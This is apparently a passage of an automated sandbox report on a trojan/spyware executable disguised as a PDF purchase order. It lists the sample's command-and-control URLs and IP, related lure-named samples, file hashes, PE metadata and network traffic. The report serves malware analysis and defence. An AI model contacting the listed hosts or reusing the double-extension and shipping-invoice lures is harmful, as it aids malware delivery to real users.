                      http://127.0.0.1:HTTP/1.1#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://DynDns.comDynDNS#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.mgbless.in#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916631283.0000000002DDA000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmptrue
                      • 8%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.mgbless.in4Xl#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php127.0.0.1POST#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.mgbless.in4XlLm#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://www.mgbless.in#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ipify.org%GETMozilla/5.0#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      low
                      https://www.mgbless.inD8Xl47#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://mgbless.in#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916631283.0000000002DDA000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmpfalse
                        high
                        https://api.ipify.org%#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916704934.0000000002DFB000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        low
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://OcJtmX.com#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        104.223.93.105
                        mgbless.inUnited States
                        8100ASN-QUADRANET-GLOBALUStrue

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:528513
                        Start date:25.11.2021
                        Start time:12:18:17
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 8m 38s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:17
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@5/1@6/2
                        EGA Information:Failed
                        HDC Information:Failed
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 62
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115
                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        12:19:06API Interceptor736x Sleep call for process: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        104.223.93.105Trasferimento.vbsGet hashmaliciousBrowse
                        • nofearsw.in/cgi-sys/suspendedpage.cgi
                        EL1aBD5Zqr.exeGet hashmaliciousBrowse
                        • nofearsw.in/swo/inc/11828554f46a7d.php
                        TnUFqujldH.exeGet hashmaliciousBrowse
                        • nofearsw.in/swo/inc/11828554f46a7d.php
                        20210711494754.vbsGet hashmaliciousBrowse
                        • nofearsw.in/fen/inc/9fa099d0b6dea5.php
                        msg001.vbsGet hashmaliciousBrowse
                        • nofearsw.in/swo/inc/11828554f46a7d.php
                        Chuyen giao,pdf.vbsGet hashmaliciousBrowse
                        • nofearsw.in/swo/inc/11828554f46a7d.php
                        Dekont.vbsGet hashmaliciousBrowse
                        • nofearsw.in/swo/inc/11828554f46a7d.php
                        3Bws6ne7Ye.exeGet hashmaliciousBrowse
                        • jlpack.email/file/Panel/five/fre.php
                        filDHjBKef.exeGet hashmaliciousBrowse
                        • jlpack.email/grace/Panel/five/fre.php

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        ASN-QUADRANET-GLOBALUSDHL_119040 ontvangstbewijs,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Waldo Orden de Compra -SA112421,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        NEW PURCHASE ORDER,PDF.EXEGet hashmaliciousBrowse
                        • 104.223.93.105
                        Bestellung -SA95648,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        K7hNSg5hRL.exeGet hashmaliciousBrowse
                        • 185.121.152.212
                        jwviEiXH9lGet hashmaliciousBrowse
                        • 45.199.228.229
                        6PZ6S2YGPBGet hashmaliciousBrowse
                        • 45.199.228.221
                        DHLEXpress is sending Pre-Alert1.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Shipment_21HT42223.exeGet hashmaliciousBrowse
                        • 192.161.187.200
                        Nueva orden de compra,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        1E2503A0E84D330CB00DC6C883A889856DD3F4D849295.exeGet hashmaliciousBrowse
                        • 192.161.187.200
                        Orden de Compra -SA95680.pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL_119040 #U0930#U0938#U0940#U0926 #U0926#U0938#U094d#U0924#U093e#U0935#U0947#U091c,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL_119040 kvittodokument,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL Receipt Document,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL_1190323 receipt document,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Orden de Compra -SA95647, pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL_119040 kvittodokument,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL_119040 receipt document,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Beckhoff Inkooporder -SA95648,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        3b5074b1b5d032e5620f69f9f700ff0eDHL_119040 ontvangstbewijs,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        ORDER #63457-BLS.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        TmVqivwYxc.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        g3g1VECs9K.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        SecuriteInfo.com.ArtemisEC35A67F3663.5978.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Purchase Order.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Waldo Orden de Compra -SA112421,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        PROPOSAL CATALOG.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        LNdP6FAphu.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Zkb2VENJ38.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        ORDER 759325.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        pH7pQDWJPP.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        oZPv3ngzrx.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        a.dllGet hashmaliciousBrowse
                        • 104.223.93.105
                        NEW PURCHASE ORDER,PDF.EXEGet hashmaliciousBrowse
                        • 104.223.93.105
                        qG92QcOmb4.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        CheatValorant2.2.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        New Order.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        gm8n7Rb1Jm.exeGet hashmaliciousBrowse
                        • 104.223.93.105

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.log
                        Process:C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):2239
                        Entropy (8bit):5.354287817410997
                        Encrypted:false
                        SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                        MD5:913D1EEA179415C6D08FB255AE42B99D
                        SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                        SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                        SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.848029031113809
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        File size:526848
                        MD5:7fb080a6aa45b1ac87c003e3f84a2983
                        SHA1:fa4a0744b0b1282e3f3c167773abcd50e806c133
                        SHA256:a1e613cf9bd9b9afbd51f0c2173cb71ddfdfecdc480b4dc8fc7571a41c90100d
                        SHA512:36494dc795e23f8dd47229560f1d44010b96eb49b6326ba0cd532952e0cd532c5064ebe1b912599047d09710f91096ac729fbc76f9f0a2f0191b8ec8862c42c6
                        SSDEEP:12288:bRf70CixBFmuFM28wYADyZALQI5OX2lKsPpWscuo17Z:p70Ci1LB7vuGLQI5FlKshWhL17
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."@.a..............0......L......>.... ........@.. .......................`............@................................

                        File Icon

                        Icon Hash:00116848084a4400

                        Static PE Info

                        General

                        Entrypoint:0x47da3e
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x619F4022 [Thu Nov 25 07:49:54 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:v4.0.30319
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [ebp+0800000Eh], ch
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x7d9ec0x4f.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e0000x4884.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x840000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000x7ba540x7bc00False0.898822206439data7.8848412694IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rsrc0x7e0000x48840x4a00False0.307326858108data4.46943114905IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x840000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_ICON0x7e1300x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4294835709, next used block 4294835709
                        RT_GROUP_ICON0x823580x14data
                        RT_VERSION0x8236c0x32cdata
                        RT_MANIFEST0x826980x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Version Infos

                        DescriptionData
                        Translation0x0000 0x04b0
                        LegalCopyrightCopyright Rogers Peet
                        Assembly Version8.0.6.0
                        InternalNameDebugg.exe
                        FileVersion5.6.0.0
                        CompanyNameRogers Peet
                        LegalTrademarks
                        Comments
                        ProductNameBiblan
                        ProductVersion5.6.0.0
                        FileDescriptionBiblan
                        OriginalFilenameDebugg.exe

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 25, 2021 12:19:36.269438982 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:36.269485950 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:36.269921064 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:36.353872061 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:36.353904009 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:36.646593094 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:36.646724939 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:36.650023937 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:36.650041103 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:36.650701046 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:36.704797029 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:37.819531918 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:37.860888004 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:37.955518961 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:37.956409931 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:37.956438065 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:38.272676945 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:38.282557011 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:38.282646894 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:38.285159111 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:39.130759001 CET49843443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:39.130819082 CET44349843104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:39.130971909 CET49843443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:39.132364988 CET49843443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:39.132390022 CET44349843104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:39.380743027 CET44349843104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:39.428831100 CET49843443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:39.501010895 CET49843443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:39.501036882 CET44349843104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:39.625304937 CET44349843104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:39.627954960 CET49843443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:39.627993107 CET44349843104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:39.865533113 CET44349843104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:39.870393038 CET44349843104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:39.870578051 CET49843443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:39.871617079 CET49843443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:52.616663933 CET49846443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:52.616714001 CET44349846104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:52.616851091 CET49846443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:52.617897987 CET49846443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:52.617925882 CET44349846104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:52.871803999 CET44349846104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:52.874592066 CET49846443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:52.874634981 CET44349846104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:53.121897936 CET44349846104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:53.122678041 CET49846443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:53.122716904 CET44349846104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:53.593717098 CET44349846104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:53.604995012 CET44349846104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:53.605176926 CET49846443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:53.605667114 CET49846443192.168.2.4104.223.93.105

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 25, 2021 12:19:35.247980118 CET5802853192.168.2.48.8.8.8
                        Nov 25, 2021 12:19:35.521053076 CET53580288.8.8.8192.168.2.4
                        Nov 25, 2021 12:19:36.111958981 CET5309753192.168.2.48.8.8.8
                        Nov 25, 2021 12:19:36.132966042 CET53530978.8.8.8192.168.2.4
                        Nov 25, 2021 12:20:38.654822111 CET5653453192.168.2.48.8.8.8
                        Nov 25, 2021 12:20:38.811353922 CET53565348.8.8.8192.168.2.4
                        Nov 25, 2021 12:20:39.090369940 CET5662753192.168.2.48.8.8.8
                        Nov 25, 2021 12:20:39.128166914 CET53566278.8.8.8192.168.2.4
                        Nov 25, 2021 12:20:52.287245989 CET6311653192.168.2.48.8.8.8
                        Nov 25, 2021 12:20:52.576457977 CET53631168.8.8.8192.168.2.4
                        Nov 25, 2021 12:20:52.593071938 CET6407853192.168.2.48.8.8.8
                        Nov 25, 2021 12:20:52.613585949 CET53640788.8.8.8192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Nov 25, 2021 12:19:35.247980118 CET192.168.2.48.8.8.80x75dfStandard query (0)www.mgbless.inA (IP address)IN (0x0001)
                        Nov 25, 2021 12:19:36.111958981 CET192.168.2.48.8.8.80x36f6Standard query (0)www.mgbless.inA (IP address)IN (0x0001)
                        Nov 25, 2021 12:20:38.654822111 CET192.168.2.48.8.8.80x3f0fStandard query (0)www.mgbless.inA (IP address)IN (0x0001)
                        Nov 25, 2021 12:20:39.090369940 CET192.168.2.48.8.8.80x33adStandard query (0)www.mgbless.inA (IP address)IN (0x0001)
                        Nov 25, 2021 12:20:52.287245989 CET192.168.2.48.8.8.80xc85Standard query (0)www.mgbless.inA (IP address)IN (0x0001)
                        Nov 25, 2021 12:20:52.593071938 CET192.168.2.48.8.8.80x554cStandard query (0)www.mgbless.inA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Nov 25, 2021 12:19:35.521053076 CET8.8.8.8192.168.2.40x75dfNo error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 12:19:35.521053076 CET8.8.8.8192.168.2.40x75dfNo error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)
                        Nov 25, 2021 12:19:36.132966042 CET8.8.8.8192.168.2.40x36f6No error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 12:19:36.132966042 CET8.8.8.8192.168.2.40x36f6No error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)
                        Nov 25, 2021 12:20:38.811353922 CET8.8.8.8192.168.2.40x3f0fNo error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 12:20:38.811353922 CET8.8.8.8192.168.2.40x3f0fNo error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)
                        Nov 25, 2021 12:20:39.128166914 CET8.8.8.8192.168.2.40x33adNo error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 12:20:39.128166914 CET8.8.8.8192.168.2.40x33adNo error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)
                        Nov 25, 2021 12:20:52.576457977 CET8.8.8.8192.168.2.40xc85No error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 12:20:52.576457977 CET8.8.8.8192.168.2.40xc85No error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)
                        Nov 25, 2021 12:20:52.613585949 CET8.8.8.8192.168.2.40x554cNo error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 12:20:52.613585949 CET8.8.8.8192.168.2.40x554cNo error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • www.mgbless.in

